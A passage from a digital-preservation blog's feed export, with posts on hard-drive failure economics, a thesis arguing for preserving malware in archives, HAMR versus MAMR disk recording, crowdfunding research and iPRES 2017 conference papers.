is that devoting engineering effort to reducing infant mortality can have a significant return on investment. A drive that fails early will be returned under warranty, costing the company money. A drive that fails after the warranty expires cannot be returned. Warranty costs must be reserved against in the company's accounts. Any reduction in the rate of early failures goes straight to the company's bottom line.<br /><br />Thus engineering devoted to reducing infant mortality is much more profitable than engineering devoted to extending the drives' service life. Extending service life beyond the current five years is wasted effort, because unless Kryder's law slows even further, the drives will be replaced to get <a href="http://blog.dshr.org/2013/07/immortal-media.html">more capacity in the same slot</a>. Backblaze is <a href="https://www.backblaze.com/blog/hard-drive-benchmark-stats-2016/">replacing drives for this reason</a>:<br /><blockquote class="tr_bq">You’ll also notice that we have used a total of 85,467 hard drives. But at the end of 2016 we had 71,939 hard drives. Are we missing 13,528 hard drives? Not really. While some drives failed, the remaining drives were removed from service due primarily to migrations from smaller to larger drives.</blockquote>The first observation makes it look as though the disk manufacturers have been following this strategy. This also explains the second observation. The goal is zero infant failures for both enterprise and consumer drives. To the extent that this goal is met, failure rates for both types in the first two years would be the same, zero. It might be that after the first two years, when the consumer drives were out of warranty, they would start to fail where the enterprise drives, still in warranty, would not.<br /><br />But my guess is that both drive types will continue to fail at about the same rate because they share so much underlying technology. Backblaze has a long history of using consumer drives, and their stats show some models are reliable over 4-5 years, others not. A significant part of the enterprise drives' higher price is the cost of the five-year warranty. <br /><br /><span class="fullpost"> </span>David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com0tag:blogger.com,1999:blog-4503292949532760618.post-61041068210634030302017-10-19T08:00:00.004-07:002017-10-19T08:00:25.044-07:00Preserving MalwareJonathan Farbowitz's NYU MA thesis <a href="https://www.nyu.edu/tisch/preservation/program/student_work/2016spring/16s_thesis_farbowitz_final.pdf"><i>More Than Digital Dirt: Preserving Malware in Archives, Museums, and Libraries</i></a> is well worth a more leisurely reading than I've given it so far. He expands greatly on the argument I've made that preserving malware is important, and <a href="http://blog.dshr.org/2016/09/scary-monsters-under-bed.html">attempting to ensure archives are malware-free is harmful</a>:<br /><blockquote>At ingest time, the archive doesn't know what it is about the content future scholars will be interested in. In particular, they don't know that the scholars aren't studying the history of malware. By modifying the content during ingest they may be destroying its usefulness to future scholars. </blockquote>For example, Farbowitz introduces his third chapter <i>A​ ​Series​ ​of​ ​Inaccurate​ ​Analogies</i> thus:<br /><blockquote>In my research, I encountered several criticisms of both the intentional collection of malware by cultural heritage institutions and the preservation of malware-infected versions of digital artefacts. These critics have attempted to draw analogies between malware infection and issues that are already well-understood in the treatment and care of archival collections. I will examine each of these analogies to help clarify the debate and elucidate how malware fits within the collecting mandate of archives, museums, and libraries</blockquote>He goes on to to demolish the ideas that malware is like dirt or mold. He provides several interesting real-world examples of archival workflows encountering malware. His eighth chapter <i>Risk​ ​Assessment​ ​Considerations​ ​for​ ​Storage​ ​and​ ​Access</i> is especially valuable in addressing the reasons why malware preservation is so controversial.<br /><br />Overall, a very valuable contribution.David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com0tag:blogger.com,1999:blog-4503292949532760618.post-88158832947495846452017-10-17T08:00:00.007-07:002017-10-17T08:00:10.989-07:00Will HAMR Happen?For more than five years I've been skeptical of the <a href="http://blog.dshr.org/2012/05/catching-up.html">storage industry's optimistic roadmaps</a> in general, and the idea that HAMR (Heat Assisted Magnetic Recording) will replace the current PMR (Perpendicular Magnetic Recording) as the technology for hard disks any time soon. The first ship date for HAMR drives has been <a href="http://blog.dshr.org/2016/12/the-medium-term-prospects-for-long-term.html">slipping in real time for nearly a decade</a>, and last year <a href="http://blog.dshr.org/2017/08/approaching-physical-limits.html">Seagate slipped it again</a>: <br /><blockquote>[Seagate] is targeting 2018 for HAMR drive deliveries, with a 16TB 3.5-inch drive planned, featuring 8 platters and 16 heads. </blockquote>Now, Chris Mellor at <i>The Register</i> <a href="https://www.theregister.co.uk/2017/10/12/wdc_mamr_tech/">reports that</a>: <br /><blockquote>WDC has given up on heat-assisted magnetic recording (HAMR) and is developing a microwave-assisted technique (MAMR) to push disk drive capacity up to 100TB by the 2030s.<br /><br />It's able to do this with relatively incremental advances, avoiding the technological development barrier represented by <a href="https://www.theregister.co.uk/2016/05/12/how_will_hamr_technology_affect_seagate_in_derry/">HAMR</a>. These developments include multi-stage head actuation and so-called Damascene head construction.</blockquote>Below the fold, I assess this news.<br /><a name='more'></a><br />Although HAMR was <a href="https://www.theregister.co.uk/2012/03/20/seagate_terabit_areal_density/">demonstrated in the lab back in 2012</a>, making it <a href="https://www.theregister.co.uk/2012/03/20/seagate_terabit_areal_density/">work in production volumes is difficult</a>:<br /><blockquote>But adding the laser-heating source to the read/write head adds cost and difficulty, and ensuring its reliability, longevity and also that of the recording medium as it gets intensely heated and cooled repeatedly is also a challenge.</blockquote>A year and a half ago <a href="http://blog.dshr.org/2016/05/the-future-of-storage.html">I wrote</a>: <br /><blockquote class="tr_bq">The disk vendors cannot raise prices significantly, doing so would accelerate the reduction in unit volume. Thus their income will decrease, and thus their ability to finance the investments needed to get HAMR and then BPM into the market. The longer they delay these investments, the more difficult it becomes to afford them. Thus it is possible that HAMR and likely that BPM will be "stranded technologies", advances we know how to build, but never actually deploy in volume.</blockquote>It is starting to look like I was right. WDC's <a href="https://www.theregister.co.uk/2017/10/12/wdc_mamr_tech/">MAMR technology</a> is different, and might be easier:<br /><blockquote>It adds microwaves to the write head, using a spin-torque oscillator (STO) to generate them. Electrons in a magnetised area have a spin state, tending to spin one way or another. By applying microwaves at the right frequency a resonance effect can alter the spin state and make it easier for the write head's electrical field to alter the magnetic polarity of the domain.</blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-OVEIu1ZfC2E/WeEBkFF8ozI/AAAAAAAAD9w/eKcUzWIE4DYfdsWtjQdqT_ab26yHXxb-QCLcBGAs/s1600/wdc_mamr_hdd_vs_ssds.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="371" data-original-width="650" height="113" src="https://1.bp.blogspot.com/-OVEIu1ZfC2E/WeEBkFF8ozI/AAAAAAAAD9w/eKcUzWIE4DYfdsWtjQdqT_ab26yHXxb-QCLcBGAs/s200/wdc_mamr_hdd_vs_ssds.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://regmedia.co.uk/2017/10/12/wdc_mamr_hdd_vs_ssds.jpg">Source</a></td></tr></tbody></table>Perhaps the most interesting <a href="https://www.theregister.co.uk/2017/10/12/wdc_mamr_tech/">part of the report is that WDC</a>:<br /><blockquote>thinks it can reach a 4Tbit/in<sup>2</sup> areal density over time using MAMR technology, with a 15 per cent compound annual growth rate (CAGR) in capacity.</blockquote>I've been writing abut the slowing of Kryder's Law from 30-40%/yr to 10-20%/yr since at least 2014, and that <a href="http://blog.dshr.org/2017/07/patting-myself-on-back.html">projection has been verified</a>. Remembering that industry projections have a history of optimism, WDC's projection of a 15% Kryder rate going forward on the assumption that they can get a new recording technology into the market in 2020 should be treated skeptically. I would expect that the future Kryder rate will be more like 10% than 15%. I would also expect that the cost factor between disk and flash in the 2020s would be less than 10x rather than greater than 10x, but still more than enough to maintain hard disk's dominance of the bulk storage market.<br /><br />David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com2tag:blogger.com,1999:blog-4503292949532760618.post-20842477874978560162017-10-12T08:00:00.002-07:002017-10-12T08:00:21.120-07:00Crowdfunding<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-jhLHa4FNR8g/Wd0v4eZkD_I/AAAAAAAAD8A/Md7xEyyyl0cFg6bLhJC5tIpputLi5gGagCLcBGAs/s1600/Exolife.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="383" data-original-width="680" height="112" src="https://4.bp.blogspot.com/-jhLHa4FNR8g/Wd0v4eZkD_I/AAAAAAAAD8A/Md7xEyyyl0cFg6bLhJC5tIpputLi5gGagCLcBGAs/s200/Exolife.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://www.kickstarter.com/projects/exocube/exolife-finder-a-new-telescope-to-find-life-on-exo">ExoLife Finder</a></td></tr></tbody></table>I've been a fairly enthusiastic crowdfunder for the past 5 years; I started with the Raspberry Pi. Most recently I backed the <a href="https://www.kickstarter.com/projects/exocube/exolife-finder-a-new-telescope-to-find-life-on-exo">ExoLife Finder</a>, a huge telescope using innovative technology intended to directly image the surfaces of nearby exoplanets. Below the fold, some of my history with crowdfunding to establish my credentials before I review some recent research on the subject.<br /><br /><a name='more'></a><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-EyI7TOWnWic/Wd0s06vJNLI/AAAAAAAAD7o/5ROAoIkHSQw_exnL9gx7SZfO6ENpbMPcwCLcBGAs/s1600/Lowline.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="873" data-original-width="1552" height="112" src="https://4.bp.blogspot.com/-EyI7TOWnWic/Wd0s06vJNLI/AAAAAAAAD7o/5ROAoIkHSQw_exnL9gx7SZfO6ENpbMPcwCLcBGAs/s200/Lowline.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://thelowline.org/">The Lowline</a></td></tr></tbody></table>My <a href="https://www.kickstarter.com/">Kickstarter</a> account shows I've backed 32 funded and 5 unfunded projects. The funded ones include:<br /><ul><li><a href="https://www.kickstarter.com/projects/855802805/lowline-an-underground-park-on-nycs-lower-east-sid">The Lowline</a>, an on-going project to turn an abandoned street-car garage in NYC into an underground park.</li><li><a href="https://www.kickstarter.com/projects/202186174/roses-fine-food-from-scratch-diner-food-in-detroit">Rosie's Fine Food</a>, reviving a desolate part of Detroit by opening a restaurant.</li><li><a href="https://www.kickstarter.com/projects/1598272670/chip-the-worlds-first-9-computer">CHIP</a>, the worlds first $9 computer.</li><li><a href="https://www.kickstarter.com/projects/608159144/the-most-mysterious-star-in-the-galaxy">The Most Mysterious Star In The Galaxy</a>, Tabetha Boyajian's project to monitor brightness changes in star KIC8462852.</li></ul><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-KQAveTBy_tE/Wd0tOTgTZ0I/AAAAAAAAD7s/onRKsZ5Ivrcxwl0VsfdMCVykr5Av30ytgCLcBGAs/s1600/Scanadu.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1000" data-original-width="1500" height="133" src="https://3.bp.blogspot.com/-KQAveTBy_tE/Wd0tOTgTZ0I/AAAAAAAAD7s/onRKsZ5Ivrcxwl0VsfdMCVykr5Av30ytgCLcBGAs/s200/Scanadu.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Scanadu Scout</td></tr></tbody></table>I've also backed 8 projects on <a href="https://www.indiegogo.com/">Indiegogo</a>, such as:<br /><ul><li><a href="https://www.indiegogo.com/projects/scanadu-scout">Scanadu Scout</a>, a pocket-size gadget that measured blood pressure, pulse, temperature and blood oxygenation. Alas, it didn't get through the FDA into production, and my now-irreplacable unit has just expired after about four years of daily use.</li><li><a href="https://www.indiegogo.com/projects/code-debugging-the-gender-gap">CODE: Debugging the Gender Gap</a>, a wonderful movie about gender issues in technology.</li></ul><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-Kx1yvlpYgZs/Wd0uTqi_HcI/AAAAAAAAD70/FcCegJPgCywq7lAIbNB0S2oQmltMdB0rwCLcBGAs/s1600/CircuitStickers.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="630" data-original-width="787" height="160" src="https://3.bp.blogspot.com/-Kx1yvlpYgZs/Wd0uTqi_HcI/AAAAAAAAD70/FcCegJPgCywq7lAIbNB0S2oQmltMdB0rwCLcBGAs/s200/CircuitStickers.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://chibitronics.com/shop/chibitronics-starter-kit-circuit-sticker-sketchbook/">Chibitronics Circuit Stickers</a></td></tr></tbody></table>And 5 on <a href="https://www.crowdsupply.com/">Crowd Supply</a>, such as:<br /><ul><li>Jie Qi's amazing <a href="https://www.crowdsupply.com/chibitronics/circuit-stickers">Circuit Stickers</a>. </li><li><a href="https://www.crowdsupply.com/design-shift/orwl">ORWL</a>, a physically secure computer to defend against the "<a href="https://en.wikipedia.org/wiki/Rootkit#bootkit">Evil Maid attack</a>".</li></ul>In most cases, my reaction to the completed projects has ranged from OK to Wow! My ORWL showed up yesterday, a little later than promised. I haven't yet had time to explore its features, but it looks like a Wow! I'd guess that about 1/6 of my projects were disappointing, about half OK, and about 1/3 Wow! Which, for a venture capitalist, would be a great track record.<br /><br />Ethan Mollick's 2013 paper <a href="https://doi.org/10.1016/j.jbusvent.2013.06.005"><i>The dynamics of crowdfunding: An exploratory study</i></a> showed that:<br /><blockquote>the vast majority of founders seem to fulfill their obligations to funders, but that over 75% deliver products later than expected, with the degree of delay predicted by the level and amount of funding a project receives. </blockquote>Mollick <a href="https://doi.org/10.1016/j.jbusvent.2013.06.005">found that</a>:<br /><blockquote>The majority of products were delayed, some substantially, and may, ultimately, never be delivered. Of the 247 projects that delivered goods, the mean delay was 1.28 months (sd = 1.56). Of the 126 projects that were delayed, the mean delay to date was 2.4 months (sd = 1.97). Only 24.9% of projects delivered on time, and 33% had yet to deliver.<br />...<br />I find strong evidence that project size and the increased expectations around highly popular projects are related to delays. ... even controlling for project size, the degree to which projects are overfunded also predicts delays. Projects that are funded at10× their goal are half as likely to deliver at a given time, compared to projects funded at their goal. ... project delays were attributed to a range of problems associated with unexpected success: manufacturing problems, the complexity of shipping, changes in scale, changes in scope, and unanticipated certification issues were all listed as primary causes of delays.</blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-emeJdQnAjsg/Wd6RdWB13_I/AAAAAAAAD88/rTJ8GBJL74UjSgYEje7p55IuJVKsAbGYwCLcBGAs/s1600/orwl.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="421" data-original-width="749" height="111" src="https://4.bp.blogspot.com/-emeJdQnAjsg/Wd6RdWB13_I/AAAAAAAAD88/rTJ8GBJL74UjSgYEje7p55IuJVKsAbGYwCLcBGAs/s200/orwl.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://www.crowdsupply.com/design-shift/orwl">[ORWL}</a></td></tr></tbody></table>ORWL was funded four times its relatively modest $25K goal, so some delay is normal. In my opinion, overfunding delays are related to Bill Joy's Law of Startups: "success is inversely proportional to the amount of money". What Bill meant was that tight funding forces teams to take decisions quickly and stick with them, ensuring that if they are going to fail they fail fast. Lavish funding enables analysis paralysis, and pursuit of multiple options simultaneously, both of which detract from focus.<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-cppjIjKqQD4/Wd6Sx8cOseI/AAAAAAAAD9I/sqQpArBlsO4PToUG2OqXe9SCvZQriyLngCLcBGAs/s1600/nerdwax.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="873" data-original-width="1552" height="112" src="https://2.bp.blogspot.com/-cppjIjKqQD4/Wd6Sx8cOseI/AAAAAAAAD9I/sqQpArBlsO4PToUG2OqXe9SCvZQriyLngCLcBGAs/s200/nerdwax.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://www.kickstarter.com/projects/donhejny/nerdwax-it-keeps-your-glasses-up">Nerdwax</a></td></tr></tbody></table>The recently published research is <a href="https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3003283"><i>Does the Crowd Support Innovation? Innovation Claims and Success on Kickstarter</i></a> by Anirban Mukherjee <i>et al</i> with an overview <a href="https://knowledge.insead.edu/kickstarter-backers-like-novelty-or-usefulness-not-both-0">here</a>:<br /><blockquote>we arrive at the startling conclusion that novelty and usefulness are not viewed as synergistic by the crowd. While crowdfunding pledges are boosted when the project is said to be useful (or alternatively, novel), claiming that it is both reduces the total amount of pledges by 26 percent.<br /><br />Our data show that claims of novelty or usefulness, taken separately, do increase the total pledge amount. As a matter of fact, they have a very large initial effect, meaning that even one claim for usefulness (or novelty) greatly boosted the total pledged sum (as compared with projects devoid of either claim). However, it is also important to pick one or the other, not combine them. </blockquote>This conclusion is based on analyzing the text, video and images of over 50K Kickstarter projects in product-oriented categories such as Hardware and Technology using <a href="https://knowledge.insead.edu/kickstarter-backers-like-novelty-or-usefulness-not-both-0">machine-learning tools</a>:<br /><blockquote class="tr_bq">The resulting number of occurrences of the word “novel” and its synonyms served as proxy for novelty claims. Conversely, the sum of occurrences of the word “useful” and its synonyms became the measure for claimed usefulness.</blockquote>The authors <a href="https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3003283">ask</a>:<br /><blockquote>our findings are consistent with the literature on idea screening but not that on consumer evaluation of innovation, as modest innovations are more likely to get funded than more extreme innovations, i.e., innovations that are high on both novelty and usefulness. What is a possible reason for this inconsistency, given that backers in a crowdfunding context typically receive the product in exchange for their support, thus making their decision more like a product choice decision than a typical idea screening decision?</blockquote>The authors <a href="https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3003283">speculate that</a>:<br /><blockquote>this may be due to the high degree of uncertainty associated with the choice in a crowdfunding context, compared to a consumer purchase context. In the prototypical purchase context, consumer protection laws guarantee receipt of the purchased product. In the crowdfunding context, however, there is much greater uncertainty regarding (a) receiving the product and (b) features of the product, than in purchasing, for the following reasons. First, a project may not successfully reach its funding goal. In this case, backers are refunded but do not receive the product. Second, a successfully funded project may be delayed or may fail (the creator may be unable to follow-through). For example, a recent study ... found that more than three-quarters of successfully funded projects (on Kickstarter) are either delayed or failed. In this case, backers are neither guaranteed refunds – they may lose the entire amount pledged – nor guaranteed receipt of the product. Third, projects on Kickstarter are proposed blueprints, rather than descriptions, of the final product. ... we speculate that the higher level of uncertainty in the crowdfunding context drives backers to choose modest innovations and shy away from more extreme innovations, i.e., innovations that are high on both novelty and usefulness.</blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-IcMhhLGBYhw/Wd1I2m2nlOI/AAAAAAAAD8Q/5cjy8JPFhYwxNVaAv9EvYziNkPe4Az7rgCLcBGAs/s1600/HexBright.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="510" data-original-width="680" height="150" src="https://4.bp.blogspot.com/-IcMhhLGBYhw/Wd1I2m2nlOI/AAAAAAAAD8Q/5cjy8JPFhYwxNVaAv9EvYziNkPe4Az7rgCLcBGAs/s200/HexBright.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://www.kickstarter.com/projects/christian-carlberg/hexbright-an-open-source-light">HexBright</a></td></tr></tbody></table>I agree that for product-oriented projects the extra uncertainty over a purchase tends to make backers conservative. But I may be an outlier. Overall, my experience for product-oriented projects is much better that Mollick's numbers; 1 failure to deliver and 2 long delays in 21 projects. Maybe I'm better than average at assessing projects. I have sometimes favored novelty over usefulness. For example, who really <i>needs</i> an <a href="https://www.kickstarter.com/projects/christian-carlberg/hexbright-an-open-source-light">open-source Arduino-compatible flashlight</a>? But HexBright turned out to be a really good flashlight even ignoring the Arduino inside, which I have never found time to program.<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-TCQsDIkP01I/Wd1KMRvUHFI/AAAAAAAAD8c/pF0UoHvsWLcymNgreAjVIiuYD20BU-TtwCLcBGAs/s1600/usb-condom.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="499" data-original-width="749" height="133" src="https://4.bp.blogspot.com/-TCQsDIkP01I/Wd1KMRvUHFI/AAAAAAAAD8c/pF0UoHvsWLcymNgreAjVIiuYD20BU-TtwCLcBGAs/s200/usb-condom.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://www.crowdsupply.com/xipiter/usbcondom">USB Condom</a></td></tr></tbody></table>On the other hand, I've sometimes favored usefulness over innovation. There's not a great deal of innovation in a <a href="https://www.crowdsupply.com/xipiter/usbcondom">USB Condom</a>, which is simply two USB connectors on a circuit board lacking the data connections. You can check this by looking at the traces. But it is very useful even for people less paranoid than I.<br /><br />It is important to note that, as far as I can see, almost all the research on crowdfunding is restricted to product-oriented projects. Products are only about 2/3 of my backings.<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-wCvy56FmBWU/Wd6V3eyyBuI/AAAAAAAAD9U/VM7fCnymsPoeYe93H1nF62jGVvEIw2D4wCLcBGAs/s1600/Rosies.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="321" data-original-width="641" height="100" src="https://1.bp.blogspot.com/-wCvy56FmBWU/Wd6V3eyyBuI/AAAAAAAAD9U/VM7fCnymsPoeYe93H1nF62jGVvEIw2D4wCLcBGAs/s200/Rosies.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://ksr-video.imgix.net/projects/934756/video-369162-webm.webm">Rosie's Fine Food</a></td></tr></tbody></table>But I, like many backers, also fund scientific and engineering research, arts projects, even restaurants in return for T-shirts, meal coupons and other <a href="https://en.wikipedia.org/wiki/Tchotchke">tchochkes</a>. In these others we are not buying an expensive T-shirt, we are supporting research, art, urban recovery and countless other worthy endeavors. With a less easily measured result, research is more difficult, and there seems to be little of it.David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com7tag:blogger.com,1999:blog-4503292949532760618.post-32126878007399395852017-10-10T08:00:00.000-07:002017-10-10T08:00:25.334-07:00IPRES 2017<div class="separator" style="clear: both; text-align: center;"></div><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-tsgYDdVVUwU/WdhHGoqiu_I/AAAAAAAAD7M/_hf9w1-fkzcSrHGOOunpA4YSTvGL9guSgCLcBGAs/s1600/JapanRailwayMuseum.JPG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1200" data-original-width="1600" height="150" src="https://2.bp.blogspot.com/-tsgYDdVVUwU/WdhHGoqiu_I/AAAAAAAAD7M/_hf9w1-fkzcSrHGOOunpA4YSTvGL9guSgCLcBGAs/s200/JapanRailwayMuseum.JPG" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://www.kyotorailwaymuseum.jp/en/">Kyoto Railway Museum</a></td></tr></tbody></table>Much as I love Kyoto, now that I'm retired with daily grandparent duties (and no-one to subsidize my travel) I couldn't attend <a href="https://ipres2017.jp/">iPRES 2017</a>.<br /><br />I have now managed to scan both <a href="https://ipres2017.jp/papers/">the papers</a>, and the very useful "<a href="https://docs.google.com/document/d/1hqIthCCY4OneY-dnmSKuyvCsHqN5VodKq_Mv3zTSeDQ/mobilebasic">collaborative notes</a>" compiled by Micky Lindlar, Joshua Ng, William Kilbride, Euan Cochrane, Jaye Weatherburn and Rachel Tropea (thanks!). Below the fold I have some notes on the papers that caught my eye. <br /><a name='more'></a><br />I have appreciated the Dutch approach to addressing problems ever since the late 70s, when I worked with Paul ten Hagen and Rens Kessner on the <a href="https://en.wikipedia.org/wiki/Graphical_Kernel_System">Graphical Kernel System standard</a>. This approach featured in two of the papers:<br /><ul><li><a href="https://ipres2017.jp/wp-content/uploads/697e22a42a4e015e46c4aa3eeaae2919.pdf"><i>How the Dutch prepared for certification</i></a> by Barbara Sierman and Kees Waterman describes how six large cultural heritage organizations worked together to ease each of their paths up the hierarchy of repository certification from <a href="https://www.datasealofapproval.org/">DSA</a> to <a href="http://www.nabd.din.ed/cmd?level=tpl-art-detailansicht&amp;committeeid=54738855&amp;artid=147058907&amp;languageid=de">Nestor</a>. The group added two preparatory stages before DSA (Initial Self-Assessment, and Exploratory Phase), comprising activities that I definitely recommend as a starting point. They also translated the DSA and Nestor standards into Dutch, enhanced some of the available tools, and conducted surveys and awareness-raising. </li><li><a href="https://ipres2017.jp/wp-content/uploads/62Joost-van-der-Natshort.pdf"><i>A Dutch approach in constructing a network of nationwide facilities for digital preservation together</i></a> by Joost van der Nat and Marcel Ras reported that:<br /><blockquote>In November&nbsp;2016, the NCDD research on the construction of a cross-domain network of facilities for long-term access to digital Cultural Heritage in the Netherlands was rewarded the Digital Preservation Award 2016 in the category Research and Innovation. According to the judges the research report presents an outstanding model to help memory institutes to share facilities and create a distributed, nationwide infrastructure network for Digital Preservation. </blockquote>The NCDD didn't go all-out for either centralization or distribution, but set out to find the optimum balance for infrastructure spanning diverse institutions:<br /><blockquote>Under the motto “Joining forces for our digital memory”, a research project was started in 2014 ... This project had the purpose to find out what level of differentiation between the domains offers the best balance for efficiency. Without collaboration, inefficiencies loom, while individual institutes continue to expand their digital archives and may be reinventing the same wheel over and over again. The project’s objective was and is to avoid duplication of work, and to avoid wasting time, money, and energy. Economies of scale make it easier for the many smaller Dutch institutes to profit from available facilities, services, and expertise as well. Policy makers can now ponder the question “The same for less money, or more for the same money?”. </blockquote></li></ul>I've <a href="http://blog.dshr.org/2016/10/software-heritage-foundation.html">blogged before</a> about the important work of the <a href="http://www.softwareheritage.org/">Software Heritage Foundation</a>. <a href="https://ipres2017.jp/wp-content/uploads/19Roberto-Di-Cosmo.pdf"><i>Software Heritage: Why and How to Preserve Software Source Code</i></a> by Roberto Di Cosmo and Stefano Zacchiroli provides a comprehensive overview of their efforts. I'm happy to see them making two justifications for preserving open-source software that I've been harping on for years:<br /><blockquote>Source code is clearly starting to be recognized as a first class citizen in the area of cultural heritage, as it is a noble form of human production that needs to be preserved, studied, curated, and shared. Source code preservation is also an essential component of a strategy to defend against digital dark age scenarii in which one might lose track of how to make sense of digital data created by software currently in production.</blockquote>But they also provide other important justifications, such as these two:<br /><blockquote>First, Software Heritage intrinsic identifiers can precisely pinpoint specific software versions, independently of the original vendor or intermediate distributor. This <i>de facto</i> provides the equivalent of “part numbers” for FOSS components that can be referenced in quality processes and verified for correctness ....<br /><br />Second, Software Heritage will provide an open provenance knowledge base, keeping track of which software component - at various granularities: from project releases down to individual source files — has been found where on the Internet and when. Such a base can be referenced and augmented with other software-related facts, such as license information, and used by software build tools and processes to cope with current development challenges. </blockquote>Considering Software Heritage's relatively short history the coverage statistics in Section 9 of the paper are very impressive, illustrating the archive-friendly nature of open-source code repositories.<br /><br /><a href="https://mellon.org/Rosenthal-Emulation-2015">Emulation</a> featured in two papers:<br /><ul><li><a href="https://ipres2017.jp/wp-content/uploads/45Euan-Cochrane.pdf"><i>Adding Emulation Functionality to Existing Digital Preservation Infrastructure</i></a> by Euan Cochrane, Jonathan Tilbury and Oleg Stobbe is a short paper describing how Yale University Library (YUL) interfaced bwFLA, Freiburg's emulation-as-a-service infrastructure to their Preservica digital preservation system. The goal is to implement their policy:<br /><blockquote>YUL will ensure access to hardware and software dependencies of digital objects and emulation or virtualization tools by [...] Preserving, or providing access to preserved software (applications and operating systems), and pre-configured software environments, for use in interacting with digital content that depends on them. </blockquote>Yale is doing important work making Feiburg's emulation infrastructure easy-to-use in libraries. </li><li><a href="https://ipres2017.jp/wp-content/uploads/30.pdf"><i>Trustworthy and Portable Emulation Platform for Digital Preservation</i></a> by Zahra Tarkhani, Geoffrey Brown and Steven Myers:<br /><blockquote>provides a technological solution to a fundamental problem faced by libraries and archives with respect to digital preservation — how to allow patrons remote access to digital materials while limiting the risk of unauthorized copying. The solution we present allows patrons to execute trusted software on an untrusted platform; the example we explore is a game emulator which provides a convenient prototype to consider many fundamental issues. </blockquote>Their solution depends on <a href="https://software.intel.com/en-us/blogs/2016/06/10/overview-of-intel-software-guard-extensions-instructions-and-data-structures">Intel's SGX instruction set extensions</a>, meaning it will work only on Skylake and future processors. I would expect it to be obsoleted by the processor-independent, if perhaps slightly less bullet-proof, <a href="http://blog.dshr.org/2017/09/web-drm-enables-innovative-business.html">W3C Encrypted Media Extensions</a> (EME) available in all major browsers. Of course, if SGX is available, implementations of EME could use it to render the user even more helpless.</li></ul><a href="https://ipres2017.jp/wp-content/uploads/10David-WilcoxA.pdf"><i>Always on the Move: Transient Software and Data Migrations</i></a> by David Wilcox is a short paper describing the import/export utility developed to ease the data migration between versions 3 and 4 of Fedora. This has similarities with the IMLS-funded WASAPI web archive interoperability work with which the LOCKSS Program is involved. <br /><br />Although they caught my eye, I have omitted here two papers on identifiers. I plan a future post about identifiers into which I expect they will fit:<br /><ul><li><a 